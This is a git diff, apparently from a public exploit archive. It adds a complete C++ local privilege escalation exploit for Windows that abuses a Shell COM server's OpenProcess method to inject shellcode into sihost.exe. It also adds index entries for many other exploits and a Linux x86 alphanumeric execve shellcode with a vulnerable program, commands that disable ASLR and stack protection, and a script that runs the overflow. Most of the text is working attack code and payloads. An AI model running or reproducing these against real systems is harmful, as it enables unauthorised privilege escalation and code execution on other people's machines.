https://github.com/microsoft/Windows-classic-samples/blob/master/Samples/Win7Samples/com/fundamentals/dcom/simple/sclient/sclient.cpp + +#include +#include +#include + +// 54E14197-88B0-442F-B9A3-86837061E2FB +// .rdata:0000000000014108 CLSID_CoreShellComServerRegistrar dd 54E14197h ; Data1 +// .rdata:0000000000014108 dw 88B0h ; Data2 +// .rdata:0000000000014108 dw 442Fh ; Data3 +// .rdata:0000000000014108 db 0B9h, 0A3h, 86h, 83h, 70h, 61h, 0E2h, 0FBh ; Data4 +const GUID CLSID_CoreShellComServerRegistrar = { + 0x54e14197, 0x88b0, 0x442f, { + 0xb9, 0xa3, 0x86, 0x83, 0x70, 0x61, 0xe2, 0xfb +}}; + +// 27EB33A5-77F9-4AFE-AE056-FDBBE720EE7 +// .rdata:00000000000140B8 GuidICOMServerRegistrar dd 27EB33A5h ; Data1 +// .rdata:00000000000140B8 dw 77F9h ; Data2 +// .rdata:00000000000140B8 dw 4AFEh ; Data3 +// .rdata:00000000000140B8 db 0AEh, 5, 6Fh, 0DBh, 0BEh, 72h, 0Eh, 0E7h ; Data4 +MIDL_INTERFACE("27EB33A5-77F9-4AFE-AE05-6FDBBE720EE7") +ICoreShellComServerRegistrar : public IUnknown { + // 0:015> dqs 00007ff8`3fe526e8 + // [...] + // 00007ff8`3fe52730 00007ff8`3fe4a5e0 CoreShellExtFramework!Microsoft::WRL::Details::RuntimeClassImpl,1,0,0,Microsoft::WRL::FtmBase,CServiceHostComponentWithGITSite,IOSTaskCompletionRevokedHandler,ICOMServerRegistrar>::QueryInterface + // 00007ff8`3fe52738 00007ff8`3fe4a6d0 CoreShellExtFramework!Microsoft::WRL::Details::RuntimeClassImpl,1,0,0,Microsoft::WRL::FtmBase,CServiceHostComponentWithGITSite,IOSTaskCompletionRevokedHandler,ICOMServerRegistrar>::AddRef + // 00007ff8`3fe52740 00007ff8`3fe4a680 CoreShellExtFramework!Microsoft::WRL::Details::RuntimeClassImpl,1,0,0,Microsoft::WRL::FtmBase,CServiceHostComponentWithGITSite,IOSTaskCompletionRevokedHandler,ICOMServerRegistrar>::Release + // 00007ff8`3fe52748 00007ff8`3fe47260 CoreShellExtFramework!CoreShellComServerRegistrar::RegisterCOMServer + // 00007ff8`3fe52750 00007ff8`3fe476b0 CoreShellExtFramework!CoreShellComServerRegistrar::UnregisterCOMServer + // 00007ff8`3fe52758 00007ff8`3fe477f0 CoreShellExtFramework!CoreShellComServerRegistrar::DuplicateHandle + // 00007ff8`3fe52760 00007ff8`3fe47920 CoreShellExtFramework!CoreShellComServerRegistrar::OpenProcess + virtual HRESULT STDMETHODCALLTYPE RegisterCOMServer() = 0; + virtual HRESULT STDMETHODCALLTYPE UnregisterCOMServer() = 0; + virtual HRESULT STDMETHODCALLTYPE DuplicateHandle() = 0; + virtual HRESULT STDMETHODCALLTYPE OpenProcess( + const uint32_t DesiredAccess, + const bool InheritHandle, + const uint32_t ArbitraryPid, + const uint32_t TargetProcessId, + HANDLE *ProcessHandle + ) = 0; +}; + +struct Marshalled_t { + uint32_t Meow; + uint32_t ObjRefType; + GUID IfaceId; + uint32_t Flags; + uint32_t References; + uint64_t Oxid; + uint64_t Oid; + union { + uint64_t IfacePointerIdLow; + struct { + uint64_t _Dummy1 : 32; + uint64_t ServerPid : 16; + }; + }; + + uint64_t IfacePointerIdHigh; +}; + +int main() { + + // + // Initialize COM. + // + + HRESULT Hr = CoInitialize(nullptr); + if(FAILED(Hr)) { + printf("Failed to initialize COM.\nThis might be the best thing that happened in your life, carry on and never look back."); + return EXIT_FAILURE; + } + + // + // Instantiate an out-of-proc instance of `ICoreShellComServerRegistrar`. + // + + CComPtr ComServerRegistrar; + Hr = ComServerRegistrar.CoCreateInstance( + CLSID_CoreShellComServerRegistrar, + nullptr, + CLSCTX_LOCAL_SERVER + ); + + if(FAILED(Hr)) { + printf("You are probably not vulnerable (%08x) bailing out.", Hr); + return EXIT_FAILURE; + } + + // + // We don't use the copy ctor here to avoid leaking the object as the returned + // stream already has its refcount bumped by `SHCreateMemStream`. + // + + CComPtr Stream; + Stream.Attach(SHCreateMemStream(nullptr, 0)); + + // + // Get the marshalled data for the `ICoreShellComServerRegistrar` interface, so + // that we can extract the PID of the COM server (sihost.exe) in this case. + // https://twitter.com/tiraniddo/status/1208073552282488833 + // + + Hr = CoMarshalInterface( + Stream, + __uuidof(ICoreShellComServerRegistrar), + ComServerRegistrar, + MSHCTX_LOCAL, + nullptr, + MSHLFLAGS_NORMAL + ); + + if(FAILED(Hr)) { + printf("Failed to marshal the interface (%08x) bailing out.", Hr); + return EXIT_FAILURE; + } + + // + // Read the PID out of the blob now. + // + + const LARGE_INTEGER Origin {}; + Hr = Stream->Seek(Origin, STREAM_SEEK_SET, nullptr); + + uint8_t Buffer[0x1000] {}; + Hr = Stream->Read(Buffer, sizeof(Buffer), nullptr); + + union { + Marshalled_t *Blob; + void *Raw; + } Ptr; + + Ptr.Raw = Buffer; + const uint32_t SihostPid = Ptr.Blob->ServerPid; + + // + // Ready to get a `PROCESS_ALL_ACCESS` handle to the server now! + // + + HANDLE ProcessHandle; + Hr = ComServerRegistrar->OpenProcess( + PROCESS_ALL_ACCESS, + false, + SihostPid, + GetCurrentProcessId(), + &ProcessHandle + ); + + if(FAILED(Hr)) { + printf("Failed to OpenProcess (%08x) bailing out.", Hr); + return EXIT_FAILURE; + } + + // + // Allocate executable memory in the target. + // + + const auto ShellcodeAddress = LPTHREAD_START_ROUTINE(VirtualAllocEx( + ProcessHandle, + nullptr, + 0x1000, + MEM_COMMIT | MEM_RESERVE, + PAGE_EXECUTE_READWRITE + )); + + if(ShellcodeAddress == nullptr) { + printf("Failed to VirtualAllocEx memory in the target process (%d) bailing out.", GetLastError()); + return EXIT_FAILURE; + } + + // + // This is a CreateProcess(calc) shellcode generated with scc, see payload.cc. + // + + const uint8_t Shellcode[] { + 0x48, 0x83, 0xc4, 0x08, 0x48, 0x83, 0xe4, 0xf0, 0x48, 0x83, 0xec, 0x08, 0x55, 0x48, 0x8b, 0xec, + 0x48, 0x8d, 0x64, 0x24, 0xf0, 0x48, 0x8d, 0x05, 0x42, 0x02, 0x00, 0x00, 0x48, 0x89, 0x45, 0xf0, + 0x6a, 0x00, 0x8f, 0x45, 0xf8, 0x48, 0x8d, 0x05, 0x3a, 0x02, 0x00, 0x00, 0x48, 0x8d, 0x08, 0x48, + 0x8d, 0x55, 0xf0, 0xe8, 0x63, 0x01, 0x00, 0x00, 0xe8, 0xbf, 0x01, 0x00, 0x00, 0xc9, 0xc3, 0x53, + 0x56, 0x57, 0x41, 0x54, 0x55, 0x48, 0x8b, 0xec, 0x6a, 0x60, 0x58, 0x65, 0x48, 0x8b, 0x00, 0x48, + 0x8b, 0x40, 0x18, 0x48, 0x8b, 0x70, 0x10, 0x48, 0x8b, 0x46, 0x30, 0x48, 0x83, 0xf8, 0x00, 0x74, + 0x13, 0xeb, 0x08, 0x4c, 0x8b, 0x06, 0x49, 0x8b, 0xf0, 0xeb, 0xec, 0x45, 0x33, 0xdb, 0x66, 0x45, + 0x33, 0xd2, 0xeb, 0x09, 0x33, 0xc0, 0xc9, 0x41, 0x5c, 0x5f, 0x5e, 0x5b, 0xc3, 0x66, 0x8b, 0x46, + 0x58, 0x66, 0x44, 0x3b, 0xd0, 0x72, 0x11, 0xeb, 0x3c, 0x66, 0x45, 0x8b, 0xc2, 0x66, 0x41, 0x83, + 0xc0, 0x02, 0x66, 0x45, 0x8b, 0xd0, 0xeb, 0xe5, 0x45, 0x8b, 0xcb, 0x41, 0xc1, 0xe9, 0x0d, 0x41, + 0x8b, 0xc3, 0xc1, 0xe0, 0x13, 0x44, 0x0b, 0xc8, 0x41, 0x8b, 0xc1, 0x4c, 0x8b, 0x46, 0x60, 0x45, + 0x0f, 0xb7, 0xca, 0x4d, 0x03, 0xc1, 0x45, 0x8a, 0x00, 0x45, 0x0f, 0xbe, 0xc0, 0x41, 0x83, 0xf8, + 0x61, 0x72, 0x15, 0xeb, 0x07, 0x41, 0x3b, 0xcb, 0x74, 0x16, 0xeb, 0x97, 0x41, 0x83, 0xe8, 0x20, + 0x41, 0x03, 0xc0, 0x44, 0x8b, 0xd8, 0xeb, 0xb1, 0x41, 0x03, 0xc0, 0x44, 0x8b, 0xd8, 0xeb, 0xa9, + 0x4c, 0x8b, 0x56, 0x30, 0x41, 0x8b, 0x42, 0x3c, 0x4d, 0x8b, 0xe2, 0x4c, 0x03, 0xe0, 0x41, 0x8b, + 0x84, 0x24, 0x88, 0x00, 0x00, 0x00, 0x4d, 0x8b, 0xca, 0x4c, 0x03, 0xc8, 0x45, 0x33, 0xdb, 0x41, + 0x8b, 0x41, 0x18, 0x44, 0x3b, 0xd8, 0x72, 0x0b, 0xe9, 0x56, 0xff, 0xff, 0xff, 0x41, 0x83, 0xc3, + 0x01, 0xeb, 0xec, 0x41, 0x8b, 0x41, 0x20, 0x49, 0x8b, 0xda, 0x48, 0x03, 0xd8, 0x45, 0x8b, 0xc3, + 0x48, 0x8b, 0xc3, 0x4a, 0x8d, 0x04, 0x80, 0x8b, 0x00, 0x49, 0x8b, 0xfa, 0x48, 0x03, 0xf8, 0x33, + 0xc0, 0x48, 0x8b, 0xdf, 0x48, 0x83, 0xc7, 0x01, 0x44, 0x8a, 0x03, 0x41, 0x0f, 0xbe, 0xd8, 0x83, + 0xfb, 0x00, 0x74, 0x02, 0xeb, 0x06, 0x3b, 0xd0, 0x74, 0x17, 0xeb, 0xc1, 0x44, 0x8b, 0xc0, 0x41, + 0xc1, 0xe8, 0x0d, 0xc1, 0xe0, 0x13, 0x44, 0x0b, 0xc0, 0x44, 0x03, 0xc3, 0x41, 0x8b, 0xc0, 0xeb, + 0xd0, 0x41, 0x8b, 0x41, 0x1c, 0x49, 0x8b, 0xd2, 0x48, 0x03, 0xd0, 0x41, 0x8b, 0x41, 0x24, 0x4d, + 0x8b, 0xca, 0x4c, 0x03, 0xc8, 0x45, 0x8b, 0xc3, 0x49, 0x8b, 0xc1, 0x4a, 0x8d, 0x04, 0x40, 0x66, + 0x8b, 0x00, 0x0f, 0xb7, 0xc8, 0x48, 0x8b, 0xc2, 0x48, 0x8d, 0x04, 0x88, 0x8b, 0x00, 0x4c, 0x03, + 0xd0, 0x49, 0x8b, 0xc2, 0xc9, 0x41, 0x5c, 0x5f, 0x5e, 0x5b, 0xc3, 0x53, 0x56, 0x57, 0x41, 0x54, + 0x55, 0x48, 0x8b, 0xec, 0x48, 0x8b, 0xf1, 0x48, 0x8b, 0xda, 0x48, 0x8b, 0x03, 0x48, 0x83, 0xf8, + 0x00, 0x74, 0x0e, 0x48, 0x8b, 0xc6, 0x48, 0x83, 0xc6, 0x04, 0x44, 0x8b, 0x20, 0x33, 0xff, 0xeb, + 0x07, 0xc9, 0x41, 0x5c, 0x5f, 0x5e, 0x5b, 0xc3, 0x8b, 0x06, 0x41, 0x8b, 0xcc, 0x8b, 0xd0, 0xe8, + 0x6b, 0xfe, 0xff, 0xff, 0x48, 0x8b, 0xd0, 0x48, 0x83, 0xfa, 0x00, 0x74, 0x02, 0xeb, 0x06, 0x48, + 0x83, 0xc3, 0x08, 0xeb, 0xc5, 0x48, 0x8b, 0x03, 0x48, 0x8b, 0xcf, 0x48, 0x83, 0xc7, 0x01, 0x48, + 0x8d, 0x04, 0xc8, 0x48, 0x89, 0x10, 0x48, 0x83, 0xc6, 0x04, 0xeb, 0xcc, 0x57, 0x55, 0x48, 0x8b, + 0xec, 0x48, 0x8d, 0xa4, 0x24, 0x78, 0xff, 0xff, 0xff, 0x48, 0x8d, 0xbd, 0x78, 0xff, 0xff, 0xff, + 0x32, 0xc0, 0x6a, 0x68, 0x59, 0xf3, 0xaa, 0xc7, 0x85, 0x78, 0xff, 0xff, 0xff, 0x68, 0x00, 0x00, + 0x00, 0x48, 0x8d, 0x05, 0x4a, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x10, 0x4c, 0x8d, 0x95, 0x78, 0xff, + 0xff, 0xff, 0x48, 0x8d, 0x45, 0xe0, 0x33, 0xc9, 0x45, 0x33, 0xc0, 0x45, 0x33, 0xc9, 0x50, 0x41, + 0x52, 0x6a, 0x00, 0x6a, 0x00, 0x6a, 0x00, 0x6a, 0x00, 0x48, 0x8d, 0x64, 0x24, 0xe0, 0x48, 0x8d, + 0x05, 0x09, 0x00, 0x00, 0x00, 0xff, 0x10, 0x48, 0x83, 0xc4, 0x50, 0xc9, 0x5f, 0xc3, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x17, 0xca, 0x2b, 0x6e, 0x72, 0xfe, 0xb3, 0x16, 0x00, 0x00, + 0x00, 0x00, 0x63, 0x61, 0x6c, 0x63, 0x00 + }; + + if(!WriteProcessMemory( + ProcessHandle, + ShellcodeAddress, + Shellcode, + sizeof(Shellcode), + nullptr + )) { + printf("Failed to WriteProcessMemory in the target process (%d) bailing out.", GetLastError()); + + // + // At least clean up the remote process D: + // + + VirtualFreeEx(ProcessHandle, ShellcodeAddress, 0, MEM_RELEASE); + return EXIT_FAILURE; + } + + // + // Creating a remote thread on the shellcode now. + // + + DWORD ThreadId; + HANDLE ThreadHandle = CreateRemoteThread( + ProcessHandle, + nullptr, + 0, + ShellcodeAddress, + nullptr, + 0, + &ThreadId + ); + + // + // Waiting for the thread to end.. + // + + WaitForSingleObject(ThreadHandle, INFINITE); + + // + // All right, we are done here, let's clean up and exit. + // + + VirtualFreeEx(ProcessHandle, ShellcodeAddress, 0, MEM_RELEASE); + printf("Payload has been successfully injected in %d.", SihostPid); + return EXIT_SUCCESS; +} \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 52ce830ff..382fc14cc 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -6627,6 +6627,26 @@ id,file,description,date,author,type,platform,port 47794,exploits/windows/dos/47794.py,"FTP Navigator 8.03 - 'Custom Command' Denial of Service (SEH)",2019-12-19,"Chris Inzinga",dos,windows, 47797,exploits/windows/dos/47797.c,"Microsoft Windows 10 BasicRender.sys - Denial of Service (PoC)",2019-12-20,vportal,dos,windows, 47839,exploits/windows/dos/47839.py,"MSN Password Recovery 1.30 - Denial of Service (PoC)",2020-01-02,Gokkulraj,dos,windows, +47848,exploits/windows/dos/47848.py,"NetShareWatcher 1.5.8.0 - 'Name' Denial Of Service",2020-01-06,"Ismail Tasdelen",dos,windows, +47853,exploits/windows/dos/47853.py,"NetworkSleuth 3.0.0.0 - 'Key' Denial of Service (PoC)",2020-01-06,"Ismail Tasdelen",dos,windows, +47855,exploits/windows/dos/47855.py,"SpotIE 2.9.5 - 'Key' Denial of Service (PoC)",2020-01-06,"Ismail Tasdelen",dos,windows, +47856,exploits/windows/dos/47856.py,"Dnss Domain Name Search Software - 'Key' Denial of Service (PoC)",2020-01-06,"Ismail Tasdelen",dos,windows, +47857,exploits/windows/dos/47857.py,"BlueAuditor 1.7.2.0 - 'Name' Denial of Service (PoC)",2020-01-06,"Ismail Tasdelen",dos,windows, +47859,exploits/windows/dos/47859.py,"ShareAlarmPro Advanced Network Access Control - 'Key' Denial of Service (PoC)",2020-01-06,"Ismail Tasdelen",dos,windows, +47860,exploits/windows/dos/47860.py,"NetShareWatcher 1.5.8.0 - 'Key' Denial of Service (PoC)",2020-01-06,"Ismail Tasdelen",dos,windows, +47861,exploits/windows/dos/47861.py,"Dnss Domain Name Search Software - 'Name' Denial of Service (PoC)",2020-01-06,"Ismail Tasdelen",dos,windows, +47862,exploits/windows/dos/47862.py,"TextCrawler Pro3.1.1 - Denial of Service (PoC)",2020-01-06,stresser,dos,windows, +47863,exploits/windows/dos/47863.py,"RemShutdown 2.9.0.0 - 'Key' Denial of Service (PoC)",2020-01-06,"Ismail Tasdelen",dos,windows, +47864,exploits/windows/dos/47864.py,"Backup Key Recovery Recover Keys Crashed Hard Disk Drive 2.2.5 - 'Key' Denial of Service (PoC)",2020-01-06,"Ismail Tasdelen",dos,windows, +47865,exploits/windows/dos/47865.py,"RemShutdown 2.9.0.0 - 'Name' Denial of Service (PoC)",2020-01-06,"Ismail Tasdelen",dos,windows, +47866,exploits/windows/dos/47866.py,"NBMonitor 1.6.6.0 - 'Key' Denial of Service (PoC)",2020-01-06,"Ismail Tasdelen",dos,windows, +47867,exploits/windows/dos/47867.py,"Office Product Key Finder 1.5.4 - Denial of Service (PoC)",2020-01-06,Gokkulraj,dos,windows, +47868,exploits/windows/dos/47868.py,"SpotFTP FTP Password Recovery 3.0.0.0 - 'Name' Denial of Service (PoC)",2020-01-06,"Ismail Tasdelen",dos,windows, +47869,exploits/windows/dos/47869.py,"SpotMSN 2.4.6 - 'Name' Denial of Service (PoC)",2020-01-06,"Ismail Tasdelen",dos,windows, +47870,exploits/windows/dos/47870.py,"SpotIM 2.2 - 'Name' Denial Of Service",2020-01-06,"Ismail Tasdelen",dos,windows, +47871,exploits/windows/dos/47871.txt,"FTPGetter Professional 5.97.0.223 - Denial of Service (PoC)",2020-01-06,FULLSHADE,dos,windows, +47873,exploits/windows/dos/47873.py,"Duplicate Cleaner Pro 4 - Denial of Service (PoC)",2020-01-06,stresser,dos,windows, +47878,exploits/windows/dos/47878.txt,"Microsoft Outlook VCF cards - Denial of Service (PoC)",2020-01-06,hyp3rlinx,dos,windows, 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux, 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris, 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux, @@ -10862,6 +10882,8 @@ id,file,description,date,author,type,platform,port 47830,exploits/freebsd/local/47830.sh,"FreeBSD-SA-19:15.mqueuefs - Privilege Escalation",2019-12-30,"Karsten König",local,freebsd, 47838,exploits/windows/local/47838.txt,"Microsoft Windows .Group File - Code Execution",2020-01-01,hyp3rlinx,local,windows, 47845,exploits/windows/local/47845.txt,"Plantronics Hub 3.13.2 - Local Privilege Escalation",2020-01-03,Markus,local,windows, +47852,exploits/windows/local/47852.txt,"Adaware Web Companion 4.9.2159 - 'WCAssistantService' Unquoted Service Path",2020-01-06,ZwX,local,windows, +47880,exploits/windows/local/47880.cc,"Windows - Shell COM Server Registrar Local Privilege Escalation",2020-01-02,0vercl0k,local,windows, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 @@ -42150,3 +42172,13 @@ id,file,description,date,author,type,platform,port 47842,exploits/php/webapps/47842.txt,"BloodX 1.0 - Authentication Bypass",2020-01-02,riamloo,webapps,php, 47843,exploits/php/webapps/47843.txt,"Online Course Registration 2.0 - Remote Code Execution",2020-01-03,"Metin Yunus Kandemir",webapps,php, 47844,exploits/php/webapps/47844.txt,"Karakuzu ERP Management Web 5.7.0 - 'k_adi_duz' SQL Injection",2020-01-03,"Hakan TAŞKÖPRÜ",webapps,php, +47846,exploits/php/webapps/47846.txt,"Dairy Farm Shop Management System 1.0 - 'username' SQL Injection",2020-01-06,"Chris Inzinga",webapps,php, +47847,exploits/php/webapps/47847.txt,"Complaint Management System 4.0 - 'cid' SQL injection",2020-01-06,FULLSHADE,webapps,php, +47850,exploits/hardware/webapps/47850.txt,"IBM RICOH Infoprint 1532 Printer - Persistent Cross-Site Scripting",2020-01-06,"Ismail Tasdelen",webapps,hardware, +47851,exploits/php/webapps/47851.txt,"Subrion CMS 4.0.5 - Cross-Site Request Forgery (Add Admin)",2020-01-06,"Ismail Tasdelen",webapps,php, +47854,exploits/php/webapps/47854.txt,"Hostel Management System 2.0 - 'id' SQL Injection",2020-01-06,FULLSHADE,webapps,php, +47858,exploits/php/webapps/47858.txt,"elaniin CMS 1.0 - Authentication Bypass",2020-01-06,riamloo,webapps,php, +47874,exploits/php/webapps/47874.txt,"Small CRM 2.0 - Authentication Bypass",2020-01-06,FULLSHADE,webapps,php, +47875,exploits/php/webapps/47875.txt,"Voyager 1.3.0 - Directory Traversal",2020-01-06,NgoAnhDuc,webapps,php, +47876,exploits/php/webapps/47876.txt,"Codoforum 4.8.3 - Persistent Cross-Site Scripting",2020-01-06,Prasanth,webapps,php, +47879,exploits/python/webapps/47879.md,"Django < 3.0 < 2.2 < 1.11 - Account Hijack",2019-12-24,"Ryuji Tsutsui",webapps,python, diff --git a/files_shellcodes.csv b/files_shellcodes.csv index a4628419e..44ffa6119 100644 --- a/files_shellcodes.csv +++ b/files_shellcodes.csv @@ -1010,3 +1010,4 @@ id,file,description,date,author,type,platform 47530,shellcodes/linux/47530.txt,"Linux/x86 - execve(/bin/sh) socket reuse Shellcode (42 bytes)",2019-10-22,WangYihang,shellcode,linux 47564,shellcodes/linux/47564.py,"Linux/x86 - (NOT|ROT+8 Encoded) execve(/bin/sh) null-free Shellcode (47 bytes)",2019-10-30,"Daniel Ortiz",shellcode,linux 47784,shellcodes/linux_x86-64/47784.txt,"Linux/x64 - Reverse TCP Stager Shellcode (188 bytes)",2019-12-17,"Lee Mazzoleni",shellcode,linux_x86-64 +47877,shellcodes/linux/47877.c,"Linux/x86 - Execve() Alphanumeric Shellcode (66 bytes)",2020-01-06,bolonobolo,shellcode,linux diff --git a/shellcodes/linux/47877.c b/shellcodes/linux/47877.c new file mode 100644 index 000000000..5bfdd9cf0 --- /dev/null +++ b/shellcodes/linux/47877.c @@ -0,0 +1,109 @@ +# Title: Linux/x86 - Execve() Alphanumeric Shellcode (66 bytes) +# Date: 2019-12-31 +# Shellcode Author: bolonobolo +# Tested on: Linux x86 + +######################## execve.asm ############################### +global _start + +section .text +_start: + + ; int 0x80 ------------ + push 0x30 + pop eax + xor al, 0x30 + push eax + pop edx + dec eax + xor ax, 0x4f73 + xor ax, 0x3041 + push eax + push edx + pop eax + ;---------------------- + push edx + push 0x68735858 + pop eax + xor ax, 0x7777 + push eax + push 0x30 + pop eax + xor al, 0x30 + xor eax, 0x6e696230 + dec eax + push eax + + ; pushad/popad to place /bin/sh in EBX register + push esp + pop eax + push edx + push ecx + push ebx + push eax + push esp + push ebp + push esi + push edi + popad + push eax + pop ecx + push ebx + + xor al, 0x4a + xor al, 0x41 + +######################## ASCII string ########################## + +j0X40PZHf5sOf5A0PRXRj0X40hXXshXf5wwPj0X4050binHPTXRQSPTUVWaPYS4J4A + +########################## bof.c #################### + +#include +#include +#include + + int main(int argc, char *argv[]){ + char buffer[128]; + strcpy(buffer, argv[1]); + return 0; + } + + +When you test it on new kernels remember to disable the +randomize_va_space and to compile the C program with execstack enabled +and the stack protector disabled + +# bash -c 'echo "kernel.randomize_va_space = 0" >> /etc/sysctl.conf' +# sysctl -p +# gcc -z execstack -fno-stack-protector -mpreferred-stack-boundary=2 -g +bof.c -o bof + + +################################################################### + +./bof `perl -e 'print "\x90"x48 . +"j0X40PZHf5sOf5A0PRXRj0X40hXXshXf5wwPj0X4050binHPTXRQSPTUVWaPYS4J4A" . +"D"x16 . "\xff\xe4" . "\x79\xf7\xff\xbf"'` + +The \x79\xf7\xff\xbf may change, you must find yourself an address in +the NOP befor the shellcode + +#################### alpha.py ############################ + +#!/usr/bin/python +import os + +print "[*] Loading NOP" +z = "\x90"*48 +print "[*] Loading alphanumeric" +z += "j0X40PZHf5sOf5A0PRXRj0X40hXXshXf5wwPj0X4050binHPTXRQSPTUVWaPYS4J4A" +print "[*] Loading syscall" +z += "D"*16 +print "[*] Loading JMP and landing address" +z += "\xff\xe4\x79\xf7\xff\xbf" +print "[*] Popping the shell..." +os.system("./bof " + z) + + +################################################################## \ No newline at end of file